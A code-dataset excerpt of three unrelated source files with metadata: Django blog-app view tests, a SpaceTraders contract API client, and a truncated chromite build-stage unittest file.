get_user_model().objects.get(username=\"testuser\")\n permission = Permission.objects.get(codename='can_post_blogpost')\n user.user_permissions.add(permission)\n user.save()\n self.blog_data = {'title': 'testtitle', 'contents': 'testcontents'}\n self.img_data = 'blogs_app/tests/test_img.png'\n\n def test_user_created_correctly(self):\n \"\"\"Test if self.user set correctly\"\"\"\n self.assertEqual(self.user.username, \"testuser\")\n self.assertEqual(self.user.has_perm(\"blogs_app.can_post_blogpost\"), True)\n logged_user = self.client.login(username=\"testuser\", password=\"testpassword\")\n self.assertTrue(logged_user)\n\n def test_page_return_403_if_not_logged(self):\n \"\"\"Test if PermissionDenied rises if user is not logged\"\"\"\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 403)\n\n def test_page_return_200_if_logged(self):\n \"\"\"Test if Blog creation view render correctly\n\n self.user -- User object\n self.url -- string, contains page's URL\"\"\"\n self.client.force_login(self.user)\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blogs_app/create_blog.html')\n\n def test_post_new_blog(self):\n \"\"\"Test blog creation POST method\n\n self.user -- User object\n self.url -- string, contains page's URL\n self.blog_data -- dictionary, contains data for blog creation\n self.img_data -- string, contains test_img file path\n\n Do user login\n Make post with self.blog_data and image img_data\n Check responses\n Check redirection responses\"\"\"\n self.client.force_login(self.user)\n with open(self.img_data, 'rb') as img:\n response = self.client.post(self.url,\n {'title': self.blog_data['title'],\n 'contents': self.blog_data['contents'],\n 'image': img})\n self.assertEqual(response.status_code, 302)\n with open(self.img_data, 'rb') as img:\n redirect_response = self.client.post(self.url,\n {'title': self.blog_data['title'],\n 'contents': self.blog_data['contents'],\n 'image': img},\n follow=True)\n self.assertEqual(redirect_response.status_code, 200)\n self.assertTemplateUsed(redirect_response, 'blogs_app/blog_list.html')\n self.assertContains(redirect_response, 'testtitle')\n\n\nclass BlogListViewTest(TestCase):\n \"\"\"Test Blogs list page\"\"\"\n\n def test_list_view_get_method(self):\n \"\"\"Test blog list view get method\"\"\"\n url = '/blog/'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blogs_app/blog_list.html')\n\n\nclass BlogDetailsViewTest(TestCase):\n \"\"\"Test Blog detailed view page\"\"\"\n def setUp(self):\n \"\"\"Setting up test data\n\n self.url -- string\n self.user -- User object, has permission can_post_comment\n self.blog -- BlogpostModel object\n self.comment -- CommentaryModel object\n\n Create self.user\n Set password for the self.user\n Set permission for the self.user\n Login self.user\n Create self.blog\n Check if self.blog created\"\"\"\n self.url = '/blog/1'\n self.user = User.objects.create(username=\"testuser\")\n self.user.set_password(\"testpassword\")\n self.user.save()\n user = get_user_model().objects.get(username=\"testuser\")\n permission = Permission.objects.get(codename='can_post_comment')\n user.user_permissions.add(permission)\n user.save()\n self.client.force_login(self.user)\n self.blog = BlogpostModel(title='testtitle',\n contents='testcontents',\n author=self.user)\n self.blog.save()\n self.comment = CommentaryModel.objects.create(author=self.user,\n blogpost=self.blog,\n comment_body=\"First comment\",\n )\n self.comment_data = {'comment_body': 'Second comment'}\n # Test if self.blog is created normaly\n new_blog= BlogpostModel.objects.get(title=\"testtitle\")\n self.assertEqual(new_blog.title, \"testtitle\")\n self.assertEqual(new_blog.contents, \"testcontents\")\n self.assertEqual(new_blog.id, 1)\n\n def test_blog_details_page_response(self):\n \"\"\"Test blog details page GET response\n self.url -- string, contains page's URL\"\"\"\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blogs_app/blog_details.html')\n self.assertContains(response, 'testtitle')\n self.assertContains(response, 'First comment')\n\n def test_blog_details_page_post_method(self):\n \"\"\"Test blog details page POST response\n self.url -- string, contains page's URL\n self.comment_data -- Dictionary, contains data for creating comment\"\"\"\n response = self.client.post(self.url, self.comment_data, follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blogs_app/blog_details.html')\n self.assertContains(response, 'testtitle')\n self.assertContains(response, 'First comment')\n self.assertContains(response, 'Second comment')\n\n\nclass UploadCSVFileViewTest(TestCase):\n \"\"\"Test Uploading CSV file\"\"\"\n def setUp(self):\n \"\"\"Setting up test data\n\n self.url -- string, contains url address\n self.user -- User object\n self.file_root -- string, contains file address\"\"\"\n self.url = '/create_blog/csv'\n self.file_root = 'blogs_app/tests/test_csv.csv'\n self.user = User.objects.create(username=\"testuser\")\n self.user.set_password(\"testpassword\")\n self.user.save()\n user = get_user_model().objects.get(username=\"testuser\")\n permission = Permission.objects.get(codename='can_post_blogpost')\n user.user_permissions.add(permission)\n user.save()\n self.client.force_login(self.user)\n\n def test_upload_csv_file_view_get(self):\n \"\"\"Test Upload csv file GET response\"\"\"\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'blogs_app/csv_upload.html')\n\n def test_upload_csv_file_view_post(self):\n \"\"\"Test Upload csv file POST response\"\"\"\n with open(self.file_root, 'r') as csv:\n response = self.client.post(self.url, {'file': csv})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateNotUsed(response, 'blogs_app/csv_upload.html')\n self.assertContains(response, 'Blogs have been created successfully')\n", "repo_name": "GeorgeKuzora/blog_site_project", "sub_path": "blogs_app/tests/test_views.py", "file_name": "test_views.py", "file_ext": "py", "file_size_in_byte": 8127, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 26, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Permission", "line_number": 27, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 42, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 43, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 51, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 52, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 52, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 53, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 69, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 73, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 73, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 85, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 91, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 92, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 92, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 93, "usage_type": "argument"}, {"api_name": "django.test.TestCase", "line_number": 96, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 113, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 113, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 113, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 116, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects.get", "line_number": 117, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects", "line_number": 117, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Permission", "line_number": 117, "usage_type": "name"}, {"api_name": "blogs_app.models.BlogpostModel", "line_number": 121, "usage_type": "call"}, {"api_name": "blogs_app.models.BlogpostModel.objects.get", "line_number": 131, "usage_type": "call"}, {"api_name": "blogs_app.models.BlogpostModel.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "blogs_app.models.BlogpostModel", "line_number": 131, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 139, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 140, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 140, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 141, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 142, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 143, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 149, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 150, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 150, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 151, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 152, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 153, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 154, "usage_type": "argument"}, {"api_name": "django.test.TestCase", "line_number": 157, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 167, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 167, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 167, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 170, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects.get", "line_number": 171, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Permission.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Permission", "line_number": 171, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 178, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 179, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 179, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 180, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 185, "usage_type": "name"}, {"api_name": "django.http.response.status_code", "line_number": 186, "usage_type": "attribute"}, {"api_name": "django.http.response", "line_number": 186, "usage_type": "name"}, {"api_name": "django.http.response", "line_number": 187, "usage_type": "argument"}, {"api_name": "django.http.response", "line_number": 188, "usage_type": "argument"}]} +{"seq_id": "70405856806", "text": "from typing import List\n\nfrom space_traders.client import Client\nfrom space_traders.models import (\n AgentContract,\n ApiError,\n Contract,\n ContractCargo,\n)\nfrom space_traders.utils import paginator\n\n\nclass ContractApi:\n def __init__(self, client: Client) -> None:\n self.client = client\n self.base_endpoint = \"/my/contracts\"\n\n async def accept_contract(\n self, contract_id: str\n ) -> AgentContract | ApiError:\n endpoint = self.base_endpoint + f\"/{contract_id}/accept\"\n response = await self.client.send(\"post\", endpoint)\n if \"error\" in response.keys():\n return ApiError(**response)\n return AgentContract(**response[\"data\"])\n\n async def deliver_cargo_to_contract(\n self,\n contract_id: str,\n ship_id: str,\n item_id: str,\n units: int,\n ) -> ContractCargo | ApiError:\n endpoint = self.base_endpoint + f\"/{contract_id}/deliver\"\n data = {\"shipSymbol\": ship_id, \"tradeSymbol\": item_id, \"units\": units}\n response = await self.client.send(\"post\", endpoint, data=data)\n if \"error\" in response.keys():\n return ApiError(**response)\n return ContractCargo(**response[\"data\"])\n\n async def fulfill_contract(\n self, contract_id: str\n ) -> AgentContract | ApiError:\n endpoint = self.base_endpoint + f\"/{contract_id}/fulfill\"\n response = await self.client.send(\"post\", endpoint)\n if \"error\" in response.keys():\n return ApiError(**response)\n return AgentContract(**response[\"data\"])\n\n async def get_contract(self, contract_id: str) -> Contract | ApiError:\n endpoint = self.base_endpoint + f\"/{contract_id}\"\n response = await self.client.send(\"get\", endpoint)\n if \"error\" in response.keys():\n return ApiError(**response)\n return Contract(**response[\"data\"])\n\n async def list_all_contracts(self) -> List[Contract] | ApiError:\n response = await paginator(self.client, \"get\", self.base_endpoint)\n if isinstance(response, ApiError):\n return response\n return [Contract(**c) for c in response]\n", "repo_name": "dpnetca/space_trader", "sub_path": "space_traders/api/contract_api.py", "file_name": "contract_api.py", "file_ext": "py", "file_size_in_byte": 2163, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "space_traders.client.Client", "line_number": 14, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 24, "usage_type": "call"}, {"api_name": "space_traders.models.AgentContract", "line_number": 25, "usage_type": "call"}, {"api_name": "space_traders.models.AgentContract", "line_number": 20, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 20, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 38, "usage_type": "call"}, {"api_name": "space_traders.models.ContractCargo", "line_number": 39, "usage_type": "call"}, {"api_name": "space_traders.models.ContractCargo", "line_number": 33, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 33, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 47, "usage_type": "call"}, {"api_name": "space_traders.models.AgentContract", "line_number": 48, "usage_type": "call"}, {"api_name": "space_traders.models.AgentContract", "line_number": 43, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 43, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 54, "usage_type": "call"}, {"api_name": "space_traders.models.Contract", "line_number": 55, "usage_type": "call"}, {"api_name": "space_traders.models.Contract", "line_number": 50, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 50, "usage_type": "name"}, {"api_name": "space_traders.utils.paginator", "line_number": 58, "usage_type": "call"}, {"api_name": "space_traders.models.ApiError", "line_number": 59, "usage_type": "argument"}, {"api_name": "space_traders.models.Contract", "line_number": 61, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 57, "usage_type": "name"}, {"api_name": "space_traders.models.Contract", "line_number": 57, "usage_type": "name"}, {"api_name": "space_traders.models.ApiError", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "12534389935", "text": "from __future__ import print_function\n\nimport json\nimport mock\nimport os\n\nfrom chromite.cbuildbot import cbuildbot_unittest\nfrom chromite.cbuildbot import commands\nfrom chromite.cbuildbot.stages import generic_stages_unittest\nfrom chromite.cbuildbot.stages import generic_stages\nfrom chromite.cbuildbot.stages import test_stages\nfrom chromite.lib.const import waterfall\nfrom chromite.lib import constants\nfrom chromite.lib import cros_logging as logging\nfrom chromite.lib import cros_test_lib\nfrom chromite.lib import failures_lib\nfrom chromite.lib import fake_cidb\nfrom chromite.lib import osutils\nfrom chromite.lib import path_util\nfrom chromite.lib import timeout_util\n\n\n# pylint: disable=too-many-ancestors\n\nclass UnitTestStageTest(generic_stages_unittest.AbstractStageTestCase,\n cbuildbot_unittest.SimpleBuilderTestCase):\n \"\"\"Tests for the UnitTest stage.\"\"\"\n\n BOT_ID = 'amd64-generic-full'\n RELEASE_TAG = 'ToT.0.0'\n\n def setUp(self):\n self.rununittests_mock = self.PatchObject(commands, 'RunUnitTests')\n self.buildunittests_mock = self.PatchObject(\n commands, 'BuildUnitTestTarball', return_value='unit_tests.tar')\n self.uploadartifact_mock = self.PatchObject(\n generic_stages.ArchivingStageMixin, 'UploadArtifact')\n self.testauzip_mock = self.PatchObject(commands, 'TestAuZip')\n self.image_dir = os.path.join(\n self.build_root, 'src/build/images/amd64-generic/latest-cbuildbot')\n\n self._Prepare()\n\n def ConstructStage(self):\n self._run.GetArchive().SetupArchivePath()\n return test_stages.UnitTestStage(self._run, self._current_board)\n\n def testFullTests(self):\n \"\"\"Tests if full unit and cros_au_test_harness tests are run correctly.\"\"\"\n exists_mock = self.PatchObject(os.path, 'exists', return_value=True)\n makedirs_mock = self.PatchObject(osutils, 'SafeMakedirs')\n\n self.RunStage()\n makedirs_mock.assert_called_once_with(self._run.GetArchive().archive_path)\n exists_mock.assert_called_once_with(\n os.path.join(self.image_dir, 'au-generator.zip'))\n self.rununittests_mock.assert_called_once_with(\n self.build_root, self._current_board, blacklist=[], extra_env=mock.ANY)\n self.buildunittests_mock.assert_called_once_with(\n self.build_root, self._current_board,\n self._run.GetArchive().archive_path)\n self.uploadartifact_mock.assert_called_once_with(\n 'unit_tests.tar', archive=False)\n self.testauzip_mock.assert_called_once_with(self.build_root, self.image_dir)\n\n\nclass HWTestStageTest(generic_stages_unittest.AbstractStageTestCase,\n cbuildbot_unittest.SimpleBuilderTestCase):\n \"\"\"Tests for the HWTest stage.\"\"\"\n\n BOT_ID = 'x86-mario-release'\n VERSION = 'R36-5760.0.0'\n RELEASE_TAG = ''\n\n def setUp(self):\n self.run_suite_mock = self.PatchObject(commands, 'RunHWTestSuite')\n self.warning_mock = self.PatchObject(\n logging, 'PrintBuildbotStepWarnings')\n self.failure_mock = self.PatchObject(\n logging, 'PrintBuildbotStepFailure')\n\n self.suite_config = None\n self.suite = None\n self.version = None\n\n self._Prepare()\n\n def _Prepare(self, bot_id=None, version=None, warn_only=False, **kwargs):\n super(HWTestStageTest, self)._Prepare(bot_id, **kwargs)\n\n self.version = version or self.VERSION\n self._run.options.log_dir = '/b/cbuild/mylogdir'\n self.suite_config = self.GetHWTestSuite()\n self.suite_config.warn_only = warn_only\n self.suite = self.suite_config.suite\n\n def ConstructStage(self):\n self._run.GetArchive().SetupArchivePath()\n board_runattrs = self._run.GetBoardRunAttrs(self._current_board)\n board_runattrs.SetParallelDefault('test_artifacts_uploaded', True)\n return test_stages.HWTestStage(\n self._run, self._current_board, self._model, self.suite_config)\n\n def _RunHWTestSuite(self, debug=False, fails=False, warns=False,\n cmd_fail_mode=None):\n \"\"\"Verify the stage behavior in various circumstances.\n\n Args:\n debug: Whether the HWTest suite should be run in debug mode.\n fails: Whether the stage should fail.\n warns: Whether the stage should warn.\n cmd_fail_mode: How commands.RunHWTestSuite() should fail.\n If None, don't fail.\n \"\"\"\n # We choose to define these mocks in setUp() because they are\n # useful for tests that do not call this method. However, this\n # means we have to reset the mocks before each run.\n self.run_suite_mock.reset_mock()\n self.warning_mock.reset_mock()\n self.failure_mock.reset_mock()\n\n mock_report = self.PatchObject(\n test_stages.HWTestStage, 'ReportHWTestResults')\n\n to_raise = None\n\n if cmd_fail_mode == None:\n to_raise = None\n elif cmd_fail_mode == 'timeout':\n to_raise = timeout_util.TimeoutError('Timed out')\n elif cmd_fail_mode == 'suite_timeout':\n to_raise = failures_lib.SuiteTimedOut('Suite timed out')\n elif cmd_fail_mode == 'board_not_available':\n to_raise = failures_lib.BoardNotAvailable('Board not available')\n elif cmd_fail_mode == 'lab_fail':\n to_raise = failures_lib.TestLabFailure('Test lab failure')\n elif cmd_fail_mode == 'test_warn':\n to_raise = failures_lib.TestWarning('Suite passed with warnings')\n elif cmd_fail_mode == 'test_fail':\n to_raise = failures_lib.TestFailure('HWTest failed.')\n else:\n raise ValueError('cmd_fail_mode %s not supported' % cmd_fail_mode)\n\n if cmd_fail_mode == 'timeout':\n self.run_suite_mock.side_effect = to_raise\n else:\n self.run_suite_mock.return_value = commands.HWTestSuiteResult(\n to_raise, None)\n\n if fails:\n self.assertRaises(failures_lib.StepFailure, self.RunStage)\n else:\n self.RunStage()\n\n self.run_suite_mock.assert_called_once()\n self.assertEqual(self.run_suite_mock.call_args[1].get('debug'), debug)\n self.assertEqual(self.run_suite_mock.call_args[1].get('model'), self._model)\n\n # Make sure we print the buildbot failure/warning messages correctly.\n if fails:\n self.failure_mock.assert_called_once()\n else:\n self.failure_mock.assert_not_called()\n\n if warns:\n self.warning_mock.assert_called_once()\n else:\n self.warning_mock.assert_not_called()\n\n mock_report.assert_not_called()\n\n def testRemoteTrybotWithHWTest(self):\n \"\"\"Test remote trybot with hw test enabled\"\"\"\n cmd_args = ['--remote-trybot', '-r', self.build_root, '--hwtest',\n self.BOT_ID]\n self._Prepare(cmd_args=cmd_args)\n self._RunHWTestSuite()\n\n def testRemoteTrybotNoHWTest(self):\n \"\"\"Test remote trybot with no hw test\"\"\"\n cmd_args = ['--remote-trybot', '-r', self.build_root, self.BOT_ID]\n self._Prepare(cmd_args=cmd_args)\n self._RunHWTestSuite(debug=True)\n\n def testWithSuite(self):\n \"\"\"Test if run correctly with a test suite.\"\"\"\n self._RunHWTestSuite()\n\n def testHandleTestWarning(self):\n \"\"\"Tests that we pass the build on test warning.\"\"\"\n # CQ passes.\n self._Prepare('x86-alex-paladin')\n self._RunHWTestSuite(warns=True, cmd_fail_mode='test_warn')\n\n # PFQ passes.\n self._Prepare('falco-chrome-pfq')\n self._RunHWTestSuite(warns=True, cmd_fail_mode='test_warn')\n\n # Canary passes.\n self._Prepare('x86-alex-release')\n self._RunHWTestSuite(warns=True, cmd_fail_mode='test_warn')\n\n def testHandleLabFail(self):\n \"\"\"Tests that we handle lab failures correctly.\"\"\"\n # CQ fails.\n self._Prepare('x86-alex-paladin')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='lab_fail')\n\n # PFQ fails.\n self._Prepare('falco-chrome-pfq')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='lab_fail')\n\n # Canary fails.\n self._Prepare('x86-alex-release')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='lab_fail')\n\n def testWithSuiteWithFatalFailure(self):\n \"\"\"Tests that we fail on test failure.\"\"\"\n self._RunHWTestSuite(fails=True, cmd_fail_mode='test_fail')\n\n def testWithSuiteWithFatalFailureWarnFlag(self):\n \"\"\"Tests that we don't fail if HWTestConfig warn_only is True.\"\"\"\n self._Prepare('x86-alex-release', warn_only=True)\n self._RunHWTestSuite(warns=True, cmd_fail_mode='test_fail')\n\n def testHandleSuiteTimeout(self):\n \"\"\"Tests that we handle suite timeout correctly .\"\"\"\n # Canary fails.\n self._Prepare('x86-alex-release')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='suite_timeout')\n\n # CQ fails.\n self._Prepare('x86-alex-paladin')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='suite_timeout')\n\n # PFQ fails.\n self._Prepare('falco-chrome-pfq')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='suite_timeout')\n\n def testHandleBoardNotAvailable(self):\n \"\"\"Tests that we handle board not available correctly.\"\"\"\n # Canary passes.\n self._Prepare('x86-alex-release')\n self._RunHWTestSuite(warns=True, cmd_fail_mode='board_not_available')\n\n # CQ fails.\n self._Prepare('x86-alex-paladin')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='board_not_available')\n\n # PFQ fails.\n self._Prepare('falco-chrome-pfq')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='board_not_available')\n\n def testHandleTimeout(self):\n \"\"\"Tests that we handle timeout exceptions correctly.\"\"\"\n # Canary fails.\n self._Prepare('x86-alex-release')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='timeout')\n\n # CQ fails.\n self._Prepare('x86-alex-paladin')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='timeout')\n\n # PFQ fails.\n self._Prepare('falco-chrome-pfq')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='timeout')\n\n def testPayloadsNotGenerated(self):\n \"\"\"Test that we exit early if payloads are not generated.\"\"\"\n board_runattrs = self._run.GetBoardRunAttrs(self._current_board)\n board_runattrs.SetParallel('test_artifacts_uploaded', False)\n\n self.RunStage()\n\n # Make sure we make the stage orange.\n self.warning_mock.assert_called_once()\n # We exit early, so commands.RunHWTestSuite should not have been\n # called.\n self.assertFalse(self.run_suite_mock.called)\n\n def testReportHWTestResults(self):\n \"\"\"Test ReportHWTestResults.\"\"\"\n stage = self.ConstructStage()\n json_str = \"\"\"\n{\n \"tests\":{\n \"Suite job\":{\n \"status\":\"FAIL\"\n },\n \"cheets_CTS.com.android.cts.dram\":{\n \"status\":\"FAIL\"\n },\n \"cheets_ContainerSmokeTest\":{\n \"status\":\"GOOD\"\n },\n \"cheets_DownloadsFilesystem\":{\n \"status\":\"ABORT\"\n },\n \"cheets_KeyboardTest\":{\n \"status\":\"UNKNOWN\"\n }\n }\n}\n\"\"\"\n json_dump_dict = json.loads(json_str)\n db = fake_cidb.FakeCIDBConnection()\n build_id = db.InsertBuild('build_1', waterfall.WATERFALL_INTERNAL, 1,\n 'build_1', 'bot_hostname')\n\n # When json_dump_dict is None\n self.assertIsNone(stage.ReportHWTestResults(None, build_id, db))\n\n # When db is None\n self.assertIsNone(stage.ReportHWTestResults(json_dump_dict, build_id, None))\n\n # When results are successfully reported\n stage.ReportHWTestResults(json_dump_dict, build_id, db)\n results = db.GetHWTestResultsForBuilds([build_id])\n result_dict = {x.test_name: x.status for x in results}\n\n expect_dict = {\n 'cheets_DownloadsFilesystem': constants.HWTEST_STATUS_ABORT,\n 'cheets_KeyboardTest': constants.HWTEST_STATUS_OTHER,\n 'Suite job': constants.HWTEST_STATUS_FAIL,\n 'cheets_CTS.com.android.cts.dram': constants.HWTEST_STATUS_FAIL,\n 'cheets_ContainerSmokeTest': constants.HWTEST_STATUS_PASS\n }\n self.assertItemsEqual(expect_dict, result_dict)\n self.assertEqual(len(results), 5)\n\n def testPerformStageOnCQ(self):\n \"\"\"Test PerformStage on CQ.\"\"\"\n self._Prepare('eve-paladin')\n stage = self.ConstructStage()\n mock_report = self.PatchObject(\n test_stages.HWTestStage, 'ReportHWTestResults')\n cmd_result = mock.Mock(to_raise=None)\n self.PatchObject(commands, 'RunHWTestSuite', return_value=cmd_result)\n stage.PerformStage()\n\n mock_report.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY)\n\n\nclass ImageTestStageTest(generic_stages_unittest.AbstractStageTestCase,\n cros_test_lib.RunCommandTestCase,\n cbuildbot_unittest.SimpleBuilderTestCase):\n \"\"\"Test image test stage.\"\"\"\n\n BOT_ID = 'x86-mario-release'\n RELEASE_TAG = 'ToT.0.0'\n\n def setUp(self):\n self._test_root = os.path.join(self.build_root, 'tmp/results_dir')\n self.PatchObject(commands, 'CreateTestRoot', autospec=True,\n return_value='/tmp/results_dir')\n self.PatchObject(path_util, 'ToChrootPath',\n side_effect=lambda x: x)\n self._Prepare()\n\n def _Prepare(self, bot_id=None, **kwargs):\n super(ImageTestStageTest, self)._Prepare(bot_id, **kwargs)\n self._run.GetArchive().SetupArchivePath()\n\n def ConstructStage(self):\n return test_stages.ImageTestStage(self._run, self._current_board)\n\n def testPerformStage(self):\n \"\"\"Tests that we correctly run test-image script.\"\"\"\n stage = self.ConstructStage()\n stage.PerformStage()\n cmd = [\n 'sudo', '--',\n os.path.join(self.build_root, 'chromite', 'bin', 'test_image'),\n '--board', self._current_board,\n '--test_results_root',\n path_util.ToChrootPath(os.path.join(self._test_root,\n 'image_test_results')),\n path_util.ToChrootPath(stage.GetImageDirSymlink()),\n ]\n self.assertCommandContains(cmd)\n", "repo_name": "kiwibrowser/src", "sub_path": "third_party/chromite/cbuildbot/stages/test_stages_unittest.py", "file_name": "test_stages_unittest.py", "file_ext": "py", "file_size_in_byte": 13440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "chromite.cbuildbot.stages.generic_stages_unittest.AbstractStageTestCase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.generic_stages_unittest", "line_number": 25, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest.SimpleBuilderTestCase", "line_number": 26, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest", "line_number": 26, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 33, "usage_type": "argument"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 35, "usage_type": "argument"}, {"api_name": "chromite.cbuildbot.stages.generic_stages.ArchivingStageMixin", "line_number": 37, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.generic_stages", "line_number": 37, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 38, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.test_stages.UnitTestStage", "line_number": 46, "usage_type": "call"}, {"api_name": "chromite.cbuildbot.stages.test_stages", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "chromite.lib.osutils", "line_number": 51, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "mock.ANY", "line_number": 58, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.generic_stages_unittest.AbstractStageTestCase", "line_number": 67, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.generic_stages_unittest", "line_number": 67, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest.SimpleBuilderTestCase", "line_number": 68, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest", "line_number": 68, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 76, "usage_type": "argument"}, {"api_name": "chromite.lib.cros_logging", "line_number": 78, "usage_type": "argument"}, {"api_name": "chromite.lib.cros_logging", "line_number": 80, "usage_type": "argument"}, {"api_name": "chromite.cbuildbot.stages.test_stages.HWTestStage", "line_number": 101, "usage_type": "call"}, {"api_name": "chromite.cbuildbot.stages.test_stages", "line_number": 101, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.stages.test_stages.HWTestStage", "line_number": 123, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.test_stages", "line_number": 123, "usage_type": "name"}, {"api_name": "chromite.lib.timeout_util.TimeoutError", "line_number": 130, "usage_type": "call"}, {"api_name": "chromite.lib.timeout_util", "line_number": 130, "usage_type": 